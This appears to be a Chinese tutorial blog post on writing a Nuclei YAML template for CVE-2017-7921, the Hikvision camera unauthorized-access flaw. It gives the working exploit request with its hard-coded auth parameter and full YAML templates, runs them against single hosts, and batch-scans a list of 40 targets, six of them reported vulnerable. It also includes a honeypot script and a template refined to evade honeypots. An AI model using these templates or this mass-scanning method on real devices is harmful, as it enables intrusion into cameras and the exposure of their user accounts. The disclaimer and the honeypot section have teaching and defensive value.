Nuclei YAML POC 編寫以及批量檢測
- 法律與道德使用聲明
- 前言
- Nuclei 下載地址
- 下載對應版本的文件
- 關于檢查cpu架構
- 關于hkws的未授權訪問
- 參考資料
- 關于 Neclei Yaml 腳本編寫
- BP Nuclei Template 插件下載并安裝
- 利用插件編寫 POC YAML 文件
- 1、找到有漏洞的頁面抓包發送給插件
- 2、同時將`response`中的關鍵字`0.0.0.0`也發送給插件
- 3、插件中對YAML略做修訂后進行保存
- 4、將YAML模版進行保存
- 5、在Terminal中進行測試
- 6、使用經驗
- 關于對抗
- 防御方偽造漏洞特征讓`nuclei`誤判,可利用一個很簡單的`python`腳本實現:
- 攻擊方對檢測腳本進行升級
- 進一步升級yaml文件
法律與道德使用聲明
本課程/筆記及相關技術內容僅限合法授權場景使用,嚴禁一切未授權的非法行為!
1. 適用場景限制
- 本課程涉及的 網絡安全知識、工具及攻擊手法 僅允許在以下場景使用:
- ? 授權滲透測試(需獲得目標方書面授權)
- ? CTF競賽、攻防演練等合規賽事
- ? 封閉實驗環境(如本地靶場、虛擬機)
- ? 學術研究、技術教學(需確保隔離環境)
- 嚴禁 用于任何未經授權的真實系統、網絡或設備。
2. 法律與道德責任 - 根據《中華人民共和國網絡安全法》《刑法》等相關法律法規,未經授權的網絡入侵、數據竊取、系統破壞等行為均屬違法,可能面臨刑事處罰及民事賠償。
- 使用者需對自身行為負全部責任,課程作者及發布平臺不承擔任何因濫用技術導致的連帶責任。
3. 工具與知識的正當用途 - 防御視角:學習漏洞原理以提升系統防護能力。
- 教育視角:理解攻擊手法以培養安全意識與應急響應能力。
- 禁止用途:包括但不限于:
-? 入侵他人計算機系統
-? 竊取、篡改、刪除數據
-? 傳播惡意軟件(木馬、勒索病毒等)
-? 發起DDoS攻擊或網絡詐騙
4. 風險自擔原則 - 即使在合法授權場景下,操作不當仍可能導致系統崩潰、數據丟失等風險。使用者需自行評估并承擔操作后果。
5. 知識產權聲明 - 課程中涉及的第三方工具、代碼、文檔版權歸原作者所有,引用時請遵循其許可協議(如GPL、MIT等)。
6. 違法違規后果 - 技術濫用將被依法追責,包括但不限于:
- 行政拘留、罰款(《網絡安全法》第27、63條)
- 有期徒刑(《刑法》第285、286條非法侵入/破壞計算機系統罪)
- 終身禁止從事網絡安全相關職業
請務必遵守法律法規,技術向善,共同維護網絡安全環境!
如發現安全漏洞,請通過合法渠道上報(如CNVD、廠商SRC)
前言
本文根據蟻景網安實驗室百里老師的直播課進行復現
Nuclei 下載地址
https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10
下載對應版本的文件
- 如果是
kali linux,可以使用uname -a或者uname -m檢查cpu架構,如果是x86_64可以下載箭頭所指的amd版
- 如果下載速度比較慢,可以用迅雷等工具進行加速。
關于檢查cpu架構
┌──(kali?kali)-[~/Desktop/temp/Security]
└─$ uname -m
x86_64┌──(kali?kali)-[~/Desktop/temp/Security]
└─$ uname -a
Linux kali 6.12.13-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.13-1kali1 (2025-02-11) x86_64 GNU/Linux
關于hkws的未授權訪問
參考資料
漏洞詳情、具體利用、信息收集等,可以參考各位大佬的文章,這里不再贅述:
yier-G大佬-《CVE-2017-7921 海康威視(Hikvision)攝像頭漏洞復現》
暴躁的小胡!!!大佬-《2025年最新CVE-2017-7921漏洞復現》
漏洞POC
http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
如存在未授權訪問漏洞,則會返回如下頁面
如果不存在未授權訪問漏洞,則會返回如下頁面需要填寫用戶名和密碼
我們只要判斷響應結果中是否存在響應數據即可,假設這里使用0.0.0.0
關于 Neclei Yaml 腳本編寫
BP Nuclei Template 插件下載并安裝
利用插件編寫 POC YAML 文件
1、找到有漏洞的頁面抓包發送給插件
2、同時將response中的關鍵字0.0.0.0也發送給插件
3、插件中對YAML略做修訂后進行保存
最終腳本如下:
id: CVE-2017-7921info:name: cve-2017-7921-POCauthor: kaliseverity: highdescription: hkws未授權訪問漏洞reference:- https://cnblogs.com/yier-G/p/16632842.htmltags: tagshttp:- raw:- |+GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: language=en; updateTips=trueUpgrade-Insecure-Requests: 1Priority: u=0, imatchers-condition: andmatchers:- type: wordpart: bodywords:- <ipAddress>0.0.0.0</ipAddress>- type: statusstatus:- 200
4、將YAML模版進行保存
保存完畢后,文件名會被修改,同時會列出運行的命令
5、在Terminal中進行測試
-v 顯示詳細信息(實測未觸發漏洞也會列出)
-t 指定要運行的模板或者模板目錄(以逗號分隔或目錄形式)
-u 指定掃描的目標URL/主機(多個目標則指定多個-u參數)
具體可以詳見nuclei官方中文文檔https://github.com/projectdiscovery/nuclei/blob/main/README_CN.md
┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t /home/kali/Desktop/temp/CVE-2017-7921-POC.yaml -u http://{{ip:port}}/ # 其中.yaml是我們剛才寫的模版__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[INF] Your current nuclei-templates are outdated. Latest is v10.2.8
[WRN] failed to update nuclei templates: cause="failed to download templates" chain="context deadline exceeded (Client.Timeout or context cancellation while reading body); failed to read resp body" # 這里檢查模版update
[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: (outdated)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 672.773988ms. 1 matches found. # 備注,這里雖然現實時間很短,但是上面check update花了很長時間
6、使用經驗
使用
--disable-update-check不檢查升級加快掃描速度
┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t ./CVE-2017-7921-POC.yaml -u http://{{ip:port}}/ --disable-update-check # 其中.yaml是我們剛才寫的模版__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 657.58416ms. 1 matches found.
對列表進行批量掃描
這里沒有用參數 -v 所以會忽略掉不存在漏洞的信息
繼續帶上 --disable 參數,避免檢查update加快速度
┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -l list.txt -t ./CVE-2017-7921-POC.yaml --disable-update-check__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[INF] Supplied input was automatically deduplicated (7 removed).
[ERR] Could not read nuclei-ignore file: open /home/kali/.config/nuclei/.nuclei-ignore: no such file or directory
goroutine 1 [running]:
runtime/debug.Stack()runtime/debug/stack.go:26 +0x5e
github.com/projectdiscovery/nuclei/v3/pkg/catalog/config.ReadIgnoreFile()github.com/projectdiscovery/nuclei/v3/pkg/catalog/config/ignorefile.go:21 +0xd3
github.com/projectdiscovery/nuclei/v3/internal/runner.(*Runner).RunEnumeration(0xc000faf440)github.com/projectdiscovery/nuclei/v3/internal/runner/runner.go:541 +0x2cd
main.main()./main.go:223 +0xc12[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 40
[CVE-2017-7921] [http] [high] http://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] https://{{存在漏洞的ip:端口}}/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 8.02384949s. 6 matches found.
關于對抗
下面是自己突發奇想
防御方偽造漏洞特征讓nuclei誤判,可利用一個很簡單的python腳本實現:
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qsclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):def do_GET(self):# 解析URL和查詢參數parsed_path = urlparse(self.path)query_params = parse_qs(parsed_path.query)# 檢查是否是目標路徑和參數if parsed_path.path == '/Security/users' and 'auth' in query_params and query_params['auth'][0] == 'YWRtaW46MTEK':# 設置響應頭self.send_response(200)self.send_header('Content-type', 'application/xml')self.end_headers()# 返回XML內容response_xml = '''<UserList version="1.0">
<User version="1.0">
<id>1</id>
<userName>admin</userName>
<priority>high</priority>
<ipAddress>0.0.0.0</ipAddress>
<macAddress>00:00:00:00:00:00</macAddress>
<userLevel>Administrator</userLevel>
</User>
</UserList>'''
上述py腳本運行后,用python開啟服務
┌──(kali?kali)-[~/Desktop/temp]
└─$ python3 honey.py
Starting HTTP server on port 8000...
測試URL: http://localhost:8000/Security/users?auth=YWRtaW46MTEK
192.168.56.101 - - [05/Sep/2025 12:03:00] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 -
攻擊方如果單純檢測<ipAddress>0.0.0.0</ipAddress>,則nuclei會誤判
┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t ./CVE-2017-7921-POC.yaml -u http://192.168.56.101:8000/ --disable-update-check__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://192.168.56.101:8000/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921] [http] [high] http://192.168.56.101:8000/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 1.591111ms. 1 matches found.
攻擊方對檢測腳本進行升級
比如加入一些其他特征:
以Server特征為例進行修改,并保存在了CVE-2017-792-update.yaml模版中
┌──(kali?kali)-[~/Desktop/temp]
└─$ cat CVE-2017-792-update.yaml
id: CVE-2017-7921
info:name: cve-2017-7921-POCauthor: kaliseverity: highdescription: hkws未授權訪問漏洞reference:- https://cnblogs.com/yier-G/p/16632842.htmltags: tags
http:- raw:- |+GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: language=en; updateTips=trueUpgrade-Insecure-Requests: 1Priority: u=0, imatchers-condition: andmatchers:- type: wordpart: headerwords:- 'Server: App-webs' # 增加了該字段- type: wordpart: bodywords:- <ipAddress>0.0.0.0</ipAddress>- type: statusstatus:- 200
此時使用新模版再進行檢測可以看到,提示并不是漏洞。
┌──(kali?kali)-[~/Desktop/temp]
└─$ ls
CVE-2017-7921-POC.yaml CVE-2017-792-update.yaml honey.py index.html list.txt nuclei nuclei_3.4.10_linux_amd64.zip┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t ./CVE-2017-792-update.yaml -u http://192.168.56.101:8000/ --disable-update-check__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://192.168.56.101:8000/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 1.461189ms. No results found.
進一步升級yaml文件
如果是真實的漏洞,會提示App-webs,保存在test.yaml模版中
id: CVE-2017-7921info:name: cve-2017-7921-POCauthor: kaliseverity: highdescription: hkws未授權訪問漏洞檢測,包含蜜罐識別reference:- https://cnblogs.com/yier-G/p/16632842.htmltags: cve,hikvision,unauthorized-accessclassification:cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hcvss-score: 9.8cve-id: CVE-2017-7921http:- raw:- |GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: language=en; updateTips=trueUpgrade-Insecure-Requests: 1Priority: u=0, imatchers-condition: andmatchers:# 主要匹配條件 - 檢查響應體內容- type: wordpart: bodywords:- "<ipAddress>0.0.0.0</ipAddress>"# 檢查狀態碼- type: statusstatus:- 200# 檢查是否為真實設備(有Server頭)- type: wordpart: headerwords:- "Server: App-webs"name: real-device# 提取器 - 用于獲取Server頭部信息extractors:- type: regexpart: headername: serverregex:- "Server: ([^\\r\\n]*)"group: 1
此時對模擬的蜜罐和真實漏洞的目標分別進行嘗試,結果如下:
┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t ./test.yaml -u http://{{ip:port}}/ --disable-update-check__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK
[CVE-2017-7921:server] [http] [high] http://{{ip:port}}/Security/users?auth=YWRtaW46MTEK ["App-webs/"] # 留意這里的 ["App-webs/"]
[INF] Scan completed in 652.761265ms. 1 matches found.┌──(kali?kali)-[~/Desktop/temp]
└─$ ./nuclei -v -t ./test.yaml -u http://192.168.56.101:8000/ --disable-update-check__ _____ __ _______/ /__ (_)/ __ \/ / / / ___/ / _ \/ // / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10projectdiscovery.io[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.10 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2017-7921] Sent HTTP request to http://192.168.56.101:8000/Security/users?auth=YWRtaW46MTEK
[INF] Scan completed in 2.172032ms. No results found.
因技術有限,利用AI目前僅能將yaml腳本做到這個地步,另外或許利用nuclei官方自己的ai可以進一步完善。
https://cloud.projectdiscovery.io/templates
本文拋磚引玉,感謝閱讀。
學習總結-20250916)
)
用于無GPS導航的制圖師SLAM(二))
